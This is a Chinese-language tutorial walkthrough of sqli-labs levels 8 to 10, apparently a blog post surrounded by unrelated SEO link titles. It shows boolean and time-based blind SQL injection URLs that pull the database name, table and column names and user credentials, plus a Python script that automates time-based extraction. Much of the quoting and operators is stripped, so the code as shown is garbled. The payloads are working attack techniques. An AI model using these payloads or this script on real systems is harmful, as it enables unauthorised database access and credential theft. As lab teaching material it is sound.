当前位置: 首页 > news >正文

wordpress怎么用地图烟台seo网络推广

news 2026/5/28 3:54:49
wordpress怎么用地图,烟台seo网络推广,怎样帮人做网站挣钱,外贸网站定制Less8 第八关依然是先看一般状态 http://localhost/sqli-labs/Less-8/?id1 然后用单引号闭合#xff1a; http://localhost/sqli-labs/Less-8/?id1 这关的问题在于报错是不显示#xff0c;那没办法通过上篇文章的updatexml大法处理。对于这种情况#xff0c;需要用“盲…Less8 第八关依然是先看一般状态 http://localhost/sqli-labs/Less-8/?id1 然后用单引号闭合 http://localhost/sqli-labs/Less-8/?id1 这关的问题在于报错是不显示那没办法通过上篇文章的updatexml大法处理。对于这种情况需要用“盲注”说白了就是猜例如如下 http://localhost/sqli-labs/Less-8/?id1 and substr(database(), 1, 1)s -- asd 这里猜数据库第一个字幕是s当然我们不是神肯定不可能一猜就猜中。一般来说就得一个一个猜。当然我们可以利用二分查找的思路通过大于小于的方式确定并逐步缩小区间这样可以减少查询的次数。 我们通过这样的方式可以顺利查出所属数据库另外还得先查字符串的长度确定了长度再一个一个字符盲注尝试 http://localhost/sqli-labs/Less-8/?id1 and LENGTH(DATABASE())8 -- asd http://localhost/sqli-labs/Less-8/?id1 and substr(database(), 1, 1)s -- asd http://localhost/sqli-labs/Less-8/?id1 and substr(database(), 2, 1)e -- asd http://localhost/sqli-labs/Less-8/?id1 and substr(database(), 3, 1)c -- asd http://localhost/sqli-labs/Less-8/?id1 and substr(database(), 4, 1)u -- asd http://localhost/sqli-labs/Less-8/?id1 and substr(database(), 5, 1)r -- asd http://localhost/sqli-labs/Less-8/?id1 and substr(database(), 6, 1)i -- asd http://localhost/sqli-labs/Less-8/?id1 and substr(database(), 7, 1)t -- asd http://localhost/sqli-labs/Less-8/?id1 and substr(database(), 8, 1)y -- asd 一通操作下来逐个字符对比就能试出是security这个。同样的方法可以找出在information_schema.tables中第四个表的表名是users http://localhost/sqli-labs/Less-8/?id1 and (select LENGTH(table_name) from information_schema.tables where table_schemadatabase() limit 3,1)4 -- asd http://localhost/sqli-labs/Less-8/?id1 and substr((select table_name from information_schema.tables where table_schemadatabase() limit 3,1), 1, 1)u -- asd http://localhost/sqli-labs/Less-8/?id1 and substr((select table_name from information_schema.tables where table_schemadatabase() limit 3,1), 2, 1)s -- asd http://localhost/sqli-labs/Less-8/?id1 and substr((select table_name from information_schema.tables where table_schemadatabase() limit 3,1), 3, 1)e -- asd http://localhost/sqli-labs/Less-8/?id1 and substr((select table_name from information_schema.tables where table_schemadatabase() limit 3,1), 4, 1)r -- asd http://localhost/sqli-labs/Less-8/?id1 and substr((select table_name from information_schema.tables where table_schemadatabase() limit 3,1), 5, 1)s -- asd 这里都是忽略了一个一个表一个一个字符尝试的过程。 之后用同样的方式盲注找出列名 http://localhost/sqli-labs/Less-8/?id1 and (select LENGTH(column_name) from information_schema.columns where table_nameusers limit 4,1)8 -- asd http://localhost/sqli-labs/Less-8/?id1 and substr((select column_name from information_schema.columns where table_nameusers limit 4,1), 1, 1)u -- asd http://localhost/sqli-labs/Less-8/?id1 and substr((select column_name from information_schema.columns where table_nameusers limit 4,1), 2, 1)s -- asd http://localhost/sqli-labs/Less-8/?id1 and substr((select column_name from information_schema.columns where table_nameusers limit 4,1), 3, 1)e -- asd http://localhost/sqli-labs/Less-8/?id1 and substr((select column_name from information_schema.columns where table_nameusers limit 4,1), 4, 1)r -- asd http://localhost/sqli-labs/Less-8/?id1 and substr((select column_name from information_schema.columns where table_nameusers limit 4,1), 5, 1)n -- asd http://localhost/sqli-labs/Less-8/?id1 and substr((select column_name from information_schema.columns where table_nameusers limit 4,1), 6, 1)a -- asd http://localhost/sqli-labs/Less-8/?id1 and substr((select column_name from information_schema.columns where table_nameusers limit 4,1), 7, 1)m -- asd http://localhost/sqli-labs/Less-8/?id1 and substr((select column_name from information_schema.columns where table_nameusers limit 4,1), 8, 1)e -- asdhttp://localhost/sqli-labs/Less-8/?id1 and (select LENGTH(column_name) from information_schema.columns where table_nameusers limit 5,1)8 -- asd http://localhost/sqli-labs/Less-8/?id1 and substr((select column_name from information_schema.columns where table_nameusers limit 5,1), 1, 1)p -- asd http://localhost/sqli-labs/Less-8/?id1 and substr((select column_name from information_schema.columns where table_nameusers limit 5,1), 2, 1)a -- asd http://localhost/sqli-labs/Less-8/?id1 and substr((select column_name from information_schema.columns where table_nameusers limit 5,1), 3, 1)s -- asd http://localhost/sqli-labs/Less-8/?id1 and substr((select column_name from information_schema.columns where table_nameusers limit 5,1), 4, 1)s -- asd http://localhost/sqli-labs/Less-8/?id1 and substr((select column_name from information_schema.columns where table_nameusers limit 5,1), 5, 1)w -- asd http://localhost/sqli-labs/Less-8/?id1 and substr((select column_name from information_schema.columns where table_nameusers limit 5,1), 6, 1)o -- asd http://localhost/sqli-labs/Less-8/?id1 and substr((select column_name from information_schema.columns where table_nameusers limit 5,1), 7, 1)r -- asd http://localhost/sqli-labs/Less-8/?id1 and substr((select column_name from information_schema.columns where table_nameusers limit 5,1), 8, 1)d -- asd 盲注后匹配第四和第五个列名是username和password。  之后盲注找出用户名和密码 http://localhost/sqli-labs/Less-8/?id1 and (select LENGTH(username) from users limit 0,1)4 -- asd http://localhost/sqli-labs/Less-8/?id1 and ASCII(substr((select username from users limit 0,1), 1, 1))68 -- asd http://localhost/sqli-labs/Less-8/?id1 and ASCII(substr((select username from users limit 0,1), 2, 1))117 -- asd http://localhost/sqli-labs/Less-8/?id1 and ASCII(substr((select username from users limit 0,1), 3, 1))109 -- asd http://localhost/sqli-labs/Less-8/?id1 and ASCII(substr((select username from users limit 0,1), 4, 1))98 -- asdhttp://localhost/sqli-labs/Less-8/?id1 and (select LENGTH(password) from users limit 0,1)4 -- asd http://localhost/sqli-labs/Less-8/?id1 and ASCII(substr((select password from users limit 0,1), 1, 1))68 -- asd http://localhost/sqli-labs/Less-8/?id1 and ASCII(substr((select password from users limit 0,1), 2, 1))117 -- asd http://localhost/sqli-labs/Less-8/?id1 and ASCII(substr((select password from users limit 0,1), 3, 1))109 -- asd http://localhost/sqli-labs/Less-8/?id1 and ASCII(substr((select password from users limit 0,1), 4, 1))98 -- asd 这里用了ascii码来匹配因为账号密码是有大小写区分但mysql默认配置里是不区分大小写。前面数据库名、表名、列名也可以用ascii码去匹配。如果数据库本身是区分大小写的话就一定要用ascii码来匹配。 Less9 第九关难度更大了会发现无论输入什么闭合页面返回都一样。这代表这个页面是无论对错返回的东西都一样。那这种情况怎么办这里要用到“时间盲注”。时间盲注具体的做法是如果注入判断条件正确则sleep一段时间如果错误就立即返回。这样通过看请求是否sleep就能判断之前的条件是否正确。而注入条件则是第八关的内容。 举个例子当我们输入 http://localhost/sqli-labs/Less-9/?id1 and if(11,sleep(2),1) -- asd 浏览器左上角会转圈圈大概2秒通过浏览器开发者工具f12 看到等待了2秒服务器才返回。这就是时间盲注。 所以可以利用同样的语句找出数据库名 http://localhost/sqli-labs/Less-9/?id1 and if(LENGTH(DATABASE())8, sleep(2), 1) -- asd http://localhost/sqli-labs/Less-9/?id1 and if(substr(database(), 1, 1)s, sleep(2),1) -- asd http://localhost/sqli-labs/Less-9/?id1 and if(substr(database(), 2, 1)e, sleep(2),1) -- asd http://localhost/sqli-labs/Less-9/?id1 and if(substr(database(), 3, 1)c, sleep(2),1) -- asd http://localhost/sqli-labs/Less-9/?id1 and if(substr(database(), 4, 1)u, sleep(2),1) -- asd http://localhost/sqli-labs/Less-9/?id1 and if(substr(database(), 5, 1)r, sleep(2),1) -- asd http://localhost/sqli-labs/Less-9/?id1 and if(substr(database(), 6, 1)i, sleep(2),1) -- asd http://localhost/sqli-labs/Less-9/?id1 and if(substr(database(), 7, 1)t, sleep(2),1) -- asd http://localhost/sqli-labs/Less-9/?id1 and if(substr(database(), 8, 1)y, sleep(2),1) -- asd 找出表名 http://localhost/sqli-labs/Less-9/?id1 and if((select LENGTH(table_name) from information_schema.tables where table_schemadatabase() limit 3,1)5, sleep(2),1) -- asd http://localhost/sqli-labs/Less-9/?id1 and if(substr((select table_name from information_schema.tables where table_schemadatabase() limit 3,1), 1, 1)u, sleep(2),1) -- asd http://localhost/sqli-labs/Less-9/?id1 and if(substr((select table_name from information_schema.tables where table_schemadatabase() limit 3,1), 2, 1)s, sleep(2),1) -- asd http://localhost/sqli-labs/Less-9/?id1 and if(substr((select table_name from information_schema.tables where table_schemadatabase() limit 3,1), 3, 1)e, sleep(2),1) -- asd http://localhost/sqli-labs/Less-9/?id1 and if(substr((select table_name from information_schema.tables where table_schemadatabase() limit 3,1), 4, 1)r, sleep(2),1) -- asd http://localhost/sqli-labs/Less-9/?id1 and if(substr((select table_name from information_schema.tables where table_schemadatabase() limit 3,1), 5, 1)s, sleep(2),1) -- asd 找出列名 http://localhost/sqli-labs/Less-9/?id1 and if((select LENGTH(column_name) from information_schema.columns where table_nameusers limit 4,1)8, sleep(2),1) -- asd http://localhost/sqli-labs/Less-9/?id1 and if(substr((select column_name from information_schema.columns where table_nameusers limit 4,1), 1, 1)u, sleep(2),1) -- asd http://localhost/sqli-labs/Less-9/?id1 and if(substr((select column_name from information_schema.columns where table_nameusers limit 4,1), 2, 1)s, sleep(2),1) -- asd http://localhost/sqli-labs/Less-9/?id1 and if(substr((select column_name from information_schema.columns where table_nameusers limit 4,1), 3, 1)e, sleep(2),1) -- asd http://localhost/sqli-labs/Less-9/?id1 and if(substr((select column_name from information_schema.columns where table_nameusers limit 4,1), 4, 1)r, sleep(2),1) -- asd http://localhost/sqli-labs/Less-9/?id1 and if(substr((select column_name from information_schema.columns where table_nameusers limit 4,1), 5, 1)n, sleep(2),1) -- asd http://localhost/sqli-labs/Less-9/?id1 and if(substr((select column_name from information_schema.columns where table_nameusers limit 4,1), 6, 1)a, sleep(2),1) -- asd http://localhost/sqli-labs/Less-9/?id1 and if(substr((select column_name from information_schema.columns where table_nameusers limit 4,1), 7, 1)m, sleep(2),1) -- asd http://localhost/sqli-labs/Less-9/?id1 and if(substr((select column_name from information_schema.columns where table_nameusers limit 4,1), 8, 1)e, sleep(2),1) -- asdhttp://localhost/sqli-labs/Less-9/?id1 and if((select LENGTH(column_name) from information_schema.columns where table_nameusers limit 5,1)8 -- asd http://localhost/sqli-labs/Less-9/?id1 and if(substr((select column_name from information_schema.columns where table_nameusers limit 5,1), 1, 1)p, sleep(2),1) -- asd http://localhost/sqli-labs/Less-9/?id1 and if(substr((select column_name from information_schema.columns where table_nameusers limit 5,1), 2, 1)a, sleep(2),1) -- asd http://localhost/sqli-labs/Less-9/?id1 and if(substr((select column_name from information_schema.columns where table_nameusers limit 5,1), 3, 1)s, sleep(2),1) -- asd http://localhost/sqli-labs/Less-9/?id1 and if(substr((select column_name from information_schema.columns where table_nameusers limit 5,1), 4, 1)s, sleep(2),1) -- asd http://localhost/sqli-labs/Less-9/?id1 and if(substr((select column_name from information_schema.columns where table_nameusers limit 5,1), 5, 1)w, sleep(2),1) -- asd http://localhost/sqli-labs/Less-9/?id1 and if(substr((select column_name from information_schema.columns where table_nameusers limit 5,1), 6, 1)o, sleep(2),1) -- asd http://localhost/sqli-labs/Less-9/?id1 and if(substr((select column_name from information_schema.columns where table_nameusers limit 5,1), 7, 1)r, sleep(2),1) -- asd http://localhost/sqli-labs/Less-9/?id1 and if(substr((select column_name from information_schema.columns where table_nameusers limit 5,1), 8, 1)d, sleep(2),1) -- asd 最后找出账号名密码 http://localhost/sqli-labs/Less-9/?id1 and if((select LENGTH(username) from users limit 0,1)4, sleep(2),1) -- asd http://localhost/sqli-labs/Less-9/?id1 and if(ASCII(substr((select username from users limit 0,1), 1, 1))68, sleep(2),1) -- asd http://localhost/sqli-labs/Less-9/?id1 and if(ASCII(substr((select username from users limit 0,1), 2, 1))117, sleep(2),1) -- asd http://localhost/sqli-labs/Less-9/?id1 and if(ASCII(substr((select username from users limit 0,1), 3, 1))109, sleep(2),1) -- asd http://localhost/sqli-labs/Less-9/?id1 and if(ASCII(substr((select username from users limit 0,1), 4, 1))98, sleep(2),1) -- asdhttp://localhost/sqli-labs/Less-9/?id1 and if((select LENGTH(passowrd) from users limit 0,1)4, sleep(2),1) -- asd http://localhost/sqli-labs/Less-9/?id1 and if(ASCII(substr((select password from users limit 0,1), 1, 1))68, sleep(2),1) -- asd http://localhost/sqli-labs/Less-9/?id1 and if(ASCII(substr((select password from users limit 0,1), 2, 1))117, sleep(2),1) -- asd http://localhost/sqli-labs/Less-9/?id1 and if(ASCII(substr((select password from users limit 0,1), 3, 1))109, sleep(2),1) -- asd http://localhost/sqli-labs/Less-9/?id1 and if(ASCII(substr((select password from users limit 0,1), 4, 1))98, sleep(2),1) -- asd 除了添加了if条件和sleep之外基本和第八关一致效果就不另外展示了。 时间盲注脚本 一个一个手动试除非本身知道答案否则太费劲了所以可以用python脚本处理 import requests import timedb_ascii [48,49,50,51,52,53,54,55,56,57,58,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,95,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122]user_pwd_ascii []def get_method(url_params):t1 time.time()#print(url_params)r requests.get(http://localhost/sqli-labs/Less-8, paramsurl_params)t2 time.time()if t2-t1 2:return Truereturn Falsedef check_database():##数据库名长度database_len 0for i in range(100):params {id: 1 and if(LENGTH(DATABASE()) str(i) , sleep(2), 1) -- asd}if get_method(params):database_len iprint(database name length is: str(database_len))breakfor j in range(database_len):for db_char in db_ascii:params {id: 1 and if(ASCII(substr(database(), str(j 1) , 1)) str(db_char) , sleep(2),1) -- asd}if get_method(params):print(chr(db_char), end)breaktime.sleep(0.05)print()def check_table():##表数table_num 0for i in range(100):num_params {id: 1 and if((select count(1) from information_schema.tables where table_schemadatabase()) str(i) , sleep(2),1) -- asd}if get_method(num_params):table_num iprint(table number is: str(table_num))breakfor k in range(table_num):##表名长度table_name_len 0for l in range(100):tb_len_params {id: 1 and if((select LENGTH(table_name) from information_schema.tables where table_schemadatabase() limit str(k) ,1) str(l) , sleep(2),1) -- asd}if get_method(tb_len_params):table_name_len lprint(table name length is: str(table_name_len))break##表名for j in range(table_name_len):for tb_char in db_ascii:tb_name_params {id: 1 and if(ASCII(substr((select table_name from information_schema.tables where table_schemadatabase() limit str(k) ,1), str(j1) , 1)) str(tb_char) , sleep(2),1) -- asd}if get_method(tb_name_params):print(chr(tb_char), end)breaktime.sleep(0.05)print()def check_column(tb_name):##列数col_num 0for i in range(100):num_params {id: 1 and if((select count(1) from information_schema.columns where table_name tb_name ) str(i) , sleep(2),1) -- asd}if get_method(num_params):col_num iprint(column number is: str(col_num))breakfor k in range(col_num):##列名长度col_name_len 0for l in range(100):col_len_params {id: 1 and if((select LENGTH(column_name) from information_schema.columns where table_name tb_name limit str(k) ,1) str(l) , sleep(2),1) -- asd}if get_method(col_len_params):col_name_len lprint(column name length is: str(col_name_len))break##列名for j in range(col_name_len):for col_char in db_ascii:col_name_params {id: 1 and if(ASCII(substr((select column_name from information_schema.columns where table_name tb_name limit str(k) ,1), str(j 1) , 1)) str(col_char) , sleep(2),1) -- asd}if get_method(col_name_params):print(chr(col_char), end)breaktime.sleep(0.05)print()def check_username_password(tb_name, username_col, password_col, start, end):for i in range(start, end):#用户名长度username_len 0for j in range(100):username_len_params {id: 1 and if((select LENGTH( username_col ) from tb_name limit str(i) , 1) str(j) , sleep(2),1) -- asd}if get_method(username_len_params):username_len jprint(username length is: str(j))breakfor k in range(username_len):for username_char in range(33,127):username_params {id: 1 and if(ASCII(substr((select username_col from tb_name limit str(i) ,1), str(k1) , 1)) str(username_char) , sleep(2),1) -- asd}if get_method(username_params):print(chr(username_char), end)breaktime.sleep(0.05)print()# 密码长度password_len 0for l in range(100):password_len_params {id: 1 and if((select LENGTH( password_col ) from tb_name limit str(i) , 1) str(l) , sleep(2),1) -- asd}if get_method(password_len_params):password_len lprint(password length is: str(l))breakfor m in range(password_len):for password_char in range(33,127):password_params {id: 1 and if(ASCII(substr((select password_col from tb_name limit str(i) ,1), str(m1) , 1)) str(password_char) , sleep(2),1) -- asd}if get_method(password_params):print(chr(password_char), end)breaktime.sleep(0.05)print()if __name__ __main__:check_database()check_table()#check_column(users)#check_username_password(users, username, password, 0, 2) 写了一个穷举式的读者感兴趣可以写个二分查找会更快。其中查列名和用户名密码的函数需要在前面的函数中获取到表名和列名才能作为传参。 Less10 第十关和第九关除了闭合区间变成双引号外其余一致就不另外写了。
http://www.eeditor.cn/news/121934/

相关文章:

  • 手机如何免费做网站饰品做商城网站模式
  • 推进网站 集约化建设如何查询网站的建设商
  • 有什么正规的网站做代加工局域网网站建设
  • 模仿京东商城网站开发视频wordpress分类子目录
  • 为什么浙江建设厅网站保险网销平台
  • 服务好 售后好的网站建设做资讯网站盈利
  • 网站建设硬件开支关键词优化需要从哪些方面开展
  • 网站运营方案ppt成都房地产政策
  • 海珠高端网站建设知名网站定制报价
  • 专业网站建设平台北京建设工程信息网站
  • 延安网站设计wordpress获取小工具
  • 建设网站沙井织梦商城模板
  • 网站推广预算wordpress 会员注册
  • 国外网站开发wordpress不同page
  • 模板演示网站建设英文版网站
  • 网站备案管理系统素材免费下载素材库
  • 淘宝优惠劵网站建设深圳市网站建设公司排名
  • 网站商城开发一个多少钱个人网页制作策划书
  • wordpress模板适合做什么站wordpress短信登录
  • 手机网站建设公司哪家好网站权重的提升
  • 网站建设售后协议网站空间和域名绑定
  • 昆山市网站建设宁波做亚马逊网站
  • 河南高端网站建设公司wordpress邮件系统
  • 服务二级公司网站建设拼多多网站首页
  • wordpress建网站视频淘宝这种网站怎么做的?
  • 建材网站建设案例建设部网站工程设计收费标准
  • 网站seo优化包括哪些方面竭诚网络网站建设公司
  • 做名片模板网站珠海企业网站推广服务
  • 邯郸网站制作地方金蝶二次开发
  • 太原网站制作多少钱南宁制作网站公司